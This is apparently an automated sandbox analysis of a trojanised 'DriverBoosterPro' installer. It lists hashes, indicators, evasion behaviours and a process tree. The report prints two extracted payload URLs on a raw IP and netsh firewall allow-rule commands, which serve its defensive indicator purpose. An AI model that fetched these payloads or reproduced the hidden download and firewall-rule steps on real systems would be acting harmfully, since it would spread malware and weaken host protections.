Overview
overview
10Static
static
3DriverBoosterPro.exe
windows7-x64
10DriverBoosterPro.exe
windows10-2004-x64
10Install.exe
windows7-x64
10Install.exe
windows10-2004-x64
10Installer.exe
windows7-x64
10Installer.exe
windows10-2004-x64
10Installlin...it.exe
windows7-x64
7Installlin...it.exe
windows10-2004-x64
7Setup.exe
windows7-x64
10Setup.exe
windows10-2004-x64
10Setup_1.exe
windows7-x64
10Setup_1.exe
windows10-2004-x64
10Analysis
-
max time kernel
148s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11-11-2024 00:56
Static task
static1
Behavioral task
behavioral1
Sample
DriverBoosterPro.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
DriverBoosterPro.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Install.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Install.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
Installer.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
Installer.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
InstalllingFile_x64_x32mbit.exe
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
InstalllingFile_x64_x32mbit.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
Setup.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
Setup_1.exe
Resource
win7-20241010-en
General
-
Target
DriverBoosterPro.exe
-
Size
30.8MB
-
MD5
0d53802cb56260bfe67619aabfa4974f
-
SHA1
21375855ea1f0cf5fe8147a70031a44a626e0b07
-
SHA256
24f24ab0484ba98c79a49459178ea40ca2fecc54100cd913c7eff730be962290
-
SHA512
25c8930c2ec97a55d715ce5990c0ea6f1b3b266fbc20a9d012c2a7ead0d06345e4dcb85fac97ac678ab7d261e5241a5922841966df63ba8ae51b326af642c8b7
-
SSDEEP
393216:01NpF9ID9b3Mj4sVC3Z+dV+fOcaZ5xlux+Gd3nHGaTamTDWeMAQtJxKP+:0CD5FsCc44GZHrTFSFJKP+
Malware Config
Extracted
http://135.181.123.26/sccp32.dll
Extracted
http://135.181.123.26/rundll32.bat
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 1136 powershell.exe 6 1916 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 2704 powershell.exe 1136 powershell.exe 1916 powershell.exe -
Modifies Windows Firewall 2 TTPs 6 IoCs
pid Process 2448 netsh.exe 2752 netsh.exe 2204 netsh.exe 2748 netsh.exe 2616 netsh.exe 2816 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x000500000001a4db-499.dat acprotect -
Executes dropped EXE 15 IoCs
pid Process 2324 DriverBoosterPro.tmp 2452 Driver.Booster.10.0.0.65.exe 444 Driver.Booster.10.0.0.65.tmp 348 HWiNFO.exe 1652 DriverBooster.exe 2428 DriverBooster.exe 1320 HWiNFO.exe 1508 Manta.exe 2896 AutoUpdate.exe 2660 Manta.exe 2204 RttHlp.exe 2652 Manta.exe 1756 RttHlp.exe 2016 SetupHlp.exe 1372 rma.exe -
Loads dropped DLL 64 IoCs
pid Process 2176 DriverBoosterPro.exe 2324 DriverBoosterPro.tmp 2324 DriverBoosterPro.tmp 2452 Driver.Booster.10.0.0.65.exe 444 Driver.Booster.10.0.0.65.tmp 444 Driver.Booster.10.0.0.65.tmp 444 Driver.Booster.10.0.0.65.tmp 444 Driver.Booster.10.0.0.65.tmp 444 Driver.Booster.10.0.0.65.tmp 444 Driver.Booster.10.0.0.65.tmp 444 Driver.Booster.10.0.0.65.tmp 444 Driver.Booster.10.0.0.65.tmp 444 Driver.Booster.10.0.0.65.tmp 1652 DriverBooster.exe 348 HWiNFO.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 1652 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 1508 Manta.exe 1508 Manta.exe 1508 Manta.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2896 AutoUpdate.exe 2896 AutoUpdate.exe 2896 AutoUpdate.exe 2896 AutoUpdate.exe 2896 AutoUpdate.exe 2896 AutoUpdate.exe 2896 AutoUpdate.exe 1508 Manta.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2660 Manta.exe 2660 Manta.exe 2660 Manta.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 1652 DriverBooster.exe 2428 DriverBooster.exe 1508 Manta.exe 2896 AutoUpdate.exe 2660 Manta.exe 2204 RttHlp.exe 2652 Manta.exe 1756 RttHlp.exe 2016 SetupHlp.exe 1372 rma.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\IObit\Driver Booster\is-2N9RU.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-F0244.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-87UHI.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-DR02Q.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Update\Update.ini Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-I5JQ2.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-5UCJB.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\PowerMgr.dll Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Database\Scan\is-0F3JC.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-LJC64.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-8PMR0.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Update\Freeware.ini.tmp\is-TI9OF.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-4UC2C.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\DpInst\x86\is-FERCT.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-5BS8Q.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\CareScan.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ScanData\scan.dat DriverBooster.exe File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Scheduler.exe Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\DetectWave.dll Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\rma.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\is-97QPN.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-0M7F6.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Skin\is-QNI95.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\libssl-1_1.dll Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Update\Update.ini.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-A63C8.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-5H49D.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-HFTPF.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\is-DOO6D.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-HFP22.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-GL41A.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Uninstall\unins000.dat Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-GTH05.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-RGQ2J.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-7LHPL.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-DVA54.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\IsuScan.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Boost\is-K3M9Q.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Boost\is-1DP10.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\is-JFEF5.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-U71TM.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Update\dbxmas.exe\dbxmas.exe Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Update\Freeware.ini.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-ASRAL.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Language\is-8K07M.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-4FV06.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\version_IObitDel.dll DriverBooster.exe File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-JULD9.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-PREUA.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-G2EH7.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\SysRest.dll Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\Update\xmas.exe\xmas.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\LocalData\is-HP4N0.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\ScanDisp.exe Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-795BH.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-NDO89.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\is-2CAPK.tmp Driver.Booster.10.0.0.65.tmp File opened for modification C:\Program Files (x86)\IObit\Driver Booster\ScanData\scan.dat DriverBooster.exe File created C:\Program Files (x86)\IObit\Driver Booster\DpInst\x64\is-EFH9U.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-5BNE4.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Skin\is-NGG0E.tmp Driver.Booster.10.0.0.65.tmp File created C:\Program Files (x86)\IObit\Driver Booster\Update\Update.ini\is-IHGVJ.tmp Driver.Booster.10.0.0.65.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rma.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RttHlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Manta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Manta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DriverBooster.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HWiNFO.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Manta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupHlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DriverBoosterPro.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Driver.Booster.10.0.0.65.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Driver.Booster.10.0.0.65.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AutoUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DriverBooster.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RttHlp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DriverBoosterPro.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HWiNFO.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 DriverBooster.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString DriverBooster.exe -
Kills process with taskkill 2 IoCs
pid Process 3020 taskkill.exe 1060 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 2324 DriverBoosterPro.tmp 2324 DriverBoosterPro.tmp 444 Driver.Booster.10.0.0.65.tmp 2704 powershell.exe 1136 powershell.exe 1916 powershell.exe 444 Driver.Booster.10.0.0.65.tmp 444 Driver.Booster.10.0.0.65.tmp 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 1508 Manta.exe 1508 Manta.exe 2896 AutoUpdate.exe 2896 AutoUpdate.exe 2896 AutoUpdate.exe 2660 Manta.exe 2660 Manta.exe 2204 RttHlp.exe 2204 RttHlp.exe 2652 Manta.exe 2652 Manta.exe 1756 RttHlp.exe 1756 RttHlp.exe 2016 SetupHlp.exe 2016 SetupHlp.exe 2016 SetupHlp.exe 2016 SetupHlp.exe 1372 rma.exe -
Suspicious behavior: LoadsDriver 6 IoCs
pid Process 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found 480 Process not Found -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 1136 powershell.exe Token: SeDebugPrivilege 1916 powershell.exe Token: SeDebugPrivilege 3020 taskkill.exe Token: SeLoadDriverPrivilege 348 HWiNFO.exe Token: SeLoadDriverPrivilege 348 HWiNFO.exe Token: SeLoadDriverPrivilege 348 HWiNFO.exe Token: SeDebugPrivilege 1060 taskkill.exe Token: 33 2428 DriverBooster.exe Token: SeIncBasePriorityPrivilege 2428 DriverBooster.exe Token: 33 2428 DriverBooster.exe Token: SeIncBasePriorityPrivilege 2428 DriverBooster.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 2324 DriverBoosterPro.tmp 444 Driver.Booster.10.0.0.65.tmp 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2896 AutoUpdate.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2428 DriverBooster.exe 2428 DriverBooster.exe 2428 DriverBooster.exe 2896 AutoUpdate.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2176 wrote to memory of 2324 2176 DriverBoosterPro.exe 30 PID 2176 wrote to memory of 2324 2176 DriverBoosterPro.exe 30 PID 2176 wrote to memory of 2324 2176 DriverBoosterPro.exe 30 PID 2176 wrote to memory of 2324 2176 DriverBoosterPro.exe 30 PID 2176 wrote to memory of 2324 2176 DriverBoosterPro.exe 30 PID 2176 wrote to memory of 2324 2176 DriverBoosterPro.exe 30 PID 2176 wrote to memory of 2324 2176 DriverBoosterPro.exe 30 PID 2324 wrote to memory of 2452 2324 DriverBoosterPro.tmp 31 PID 2324 wrote to memory of 2452 2324 DriverBoosterPro.tmp 31 PID 2324 wrote to memory of 2452 2324 DriverBoosterPro.tmp 31 PID 2324 wrote to memory of 2452 2324 DriverBoosterPro.tmp 31 PID 2324 wrote to memory of 2452 2324 DriverBoosterPro.tmp 31 PID 2324 wrote to memory of 2452 2324 DriverBoosterPro.tmp 31 PID 2324 wrote to memory of 2452 2324 DriverBoosterPro.tmp 31 PID 2452 wrote to memory of 444 2452 Driver.Booster.10.0.0.65.exe 32 PID 2452 wrote to memory of 444 2452 Driver.Booster.10.0.0.65.exe 32 PID 2452 wrote to memory of 444 2452 Driver.Booster.10.0.0.65.exe 32 PID 2452 wrote to memory of 444 2452 Driver.Booster.10.0.0.65.exe 32 PID 2452 wrote to memory of 444 2452 Driver.Booster.10.0.0.65.exe 32 PID 2452 wrote to memory of 444 2452 Driver.Booster.10.0.0.65.exe 32 PID 2452 wrote to memory of 444 2452 Driver.Booster.10.0.0.65.exe 32 PID 2324 wrote to memory of 2832 2324 DriverBoosterPro.tmp 33 PID 2324 wrote to memory of 2832 2324 DriverBoosterPro.tmp 33 PID 2324 wrote to memory of 2832 2324 DriverBoosterPro.tmp 33 PID 2324 wrote to memory of 2832 2324 DriverBoosterPro.tmp 33 PID 2832 wrote to memory of 2704 2832 cmd.exe 35 PID 2832 wrote to memory of 2704 2832 cmd.exe 35 PID 2832 wrote to memory of 2704 2832 cmd.exe 35 PID 2832 wrote to memory of 2704 2832 cmd.exe 35 PID 2832 wrote to memory of 1136 2832 cmd.exe 37 PID 2832 wrote to memory of 1136 2832 cmd.exe 37 PID 2832 wrote to memory of 1136 2832 cmd.exe 37 PID 2832 wrote to memory of 1136 2832 cmd.exe 37 PID 2832 wrote to memory of 1916 2832 cmd.exe 38 PID 2832 wrote to memory of 1916 2832 cmd.exe 38 PID 2832 wrote to memory of 1916 2832 cmd.exe 38 PID 2832 wrote to memory of 1916 2832 cmd.exe 38 PID 444 wrote to memory of 3020 444 Driver.Booster.10.0.0.65.tmp 39 PID 444 wrote to memory of 3020 444 Driver.Booster.10.0.0.65.tmp 39 PID 444 wrote to memory of 3020 444 Driver.Booster.10.0.0.65.tmp 39 PID 444 wrote to memory of 3020 444 Driver.Booster.10.0.0.65.tmp 39 PID 444 wrote to memory of 348 444 Driver.Booster.10.0.0.65.tmp 42 PID 444 wrote to memory of 348 444 Driver.Booster.10.0.0.65.tmp 42 PID 444 wrote to memory of 348 444 Driver.Booster.10.0.0.65.tmp 42 PID 444 wrote to memory of 348 444 Driver.Booster.10.0.0.65.tmp 42 PID 444 wrote to memory of 1652 444 Driver.Booster.10.0.0.65.tmp 43 PID 444 wrote to memory of 1652 444 Driver.Booster.10.0.0.65.tmp 43 PID 444 wrote to memory of 1652 444 Driver.Booster.10.0.0.65.tmp 43 PID 444 wrote to memory of 1652 444 Driver.Booster.10.0.0.65.tmp 43 PID 444 wrote to memory of 1060 444 Driver.Booster.10.0.0.65.tmp 44 PID 444 wrote to memory of 1060 444 Driver.Booster.10.0.0.65.tmp 44 PID 444 wrote to memory of 1060 444 Driver.Booster.10.0.0.65.tmp 44 PID 444 wrote to memory of 1060 444 Driver.Booster.10.0.0.65.tmp 44 PID 444 wrote to memory of 2448 444 Driver.Booster.10.0.0.65.tmp 46 PID 444 wrote to memory of 2448 444 Driver.Booster.10.0.0.65.tmp 46 PID 444 wrote to memory of 2448 444 Driver.Booster.10.0.0.65.tmp 46 PID 444 wrote to memory of 2448 444 Driver.Booster.10.0.0.65.tmp 46 PID 444 wrote to memory of 2752 444 Driver.Booster.10.0.0.65.tmp 49 PID 444 wrote to memory of 2752 444 Driver.Booster.10.0.0.65.tmp 49 PID 444 wrote to memory of 2752 444 Driver.Booster.10.0.0.65.tmp 49 PID 444 wrote to memory of 2752 444 Driver.Booster.10.0.0.65.tmp 49 PID 444 wrote to memory of 2204 444 Driver.Booster.10.0.0.65.tmp 51 PID 444 wrote to memory of 2204 444 Driver.Booster.10.0.0.65.tmp 51 PID 444 wrote to memory of 2204 444 Driver.Booster.10.0.0.65.tmp 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe"C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\is-GTDFP.tmp\DriverBoosterPro.tmp"C:\Users\Admin\AppData\Local\Temp\is-GTDFP.tmp\DriverBoosterPro.tmp" /SL5="$400E0,31312389,996352,C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\is-MP2JM.tmp\Driver.Booster.10.0.0.65.exe"C:\Users\Admin\AppData\Local\Temp\is-MP2JM.tmp\Driver.Booster.10.0.0.65.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Users\Admin\AppData\Local\Temp\is-586A2.tmp\Driver.Booster.10.0.0.65.tmp"C:\Users\Admin\AppData\Local\Temp\is-586A2.tmp\Driver.Booster.10.0.0.65.tmp" /SL5="$5020A,29414238,361472,C:\Users\Admin\AppData\Local\Temp\is-MP2JM.tmp\Driver.Booster.10.0.0.65.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:444 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im ScanWinUpd.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3020
-
-
C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe"C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe" /brandname5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:348
-
-
C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe"C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" /skipuac5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1652
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /f /im DriverBooster.exe5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver Booster" dir=out action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2448
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver Booster" dir=in action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2752
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Booster" dir=out action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2204
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Booster" dir=in action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2748
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver" dir=out action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe" enable=yes5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2616
-
-
